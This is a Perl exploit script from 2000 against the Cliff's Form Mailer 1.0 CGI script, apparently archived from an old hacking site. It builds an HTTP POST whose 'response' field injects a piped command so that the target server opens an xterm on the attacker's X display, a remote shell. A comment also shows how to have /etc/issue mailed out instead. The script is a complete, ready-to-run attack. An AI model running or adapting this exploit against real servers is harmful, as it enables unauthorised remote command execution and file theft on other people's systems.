#!/usr/bin/perl -w ## -- Cliff's Form Mailer Version 1.0 exploit -- ## (http://www.shavenferret.com/scripts) ## ## This exploit will spawn a xterm from $target ## to $attacker:$dpy. Some tweaking may be needed. ## ## - teleh0r@doglover.com / anno 2000 - ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 \n"); exit(1); } my($target,$attacker,$dpy,$length,$command, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/form.cgi\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 90 + length($attacker.$dpy); $command = "name=hass&email=hass\@hass.com&subject=hass&body=hass&". "response=%7Cxterm+-ut+-display+$attacker%3A$dpy"; # If you just want /etc/issue (for example) to be mailed # to you, then change &response in the scalar $command to # &response=%2Fetc%2Fissue, and change &email of course ;) $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;) $sploit= "POST /cgi-bin/form.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0); # www.hack.co.za [26 July 2000]#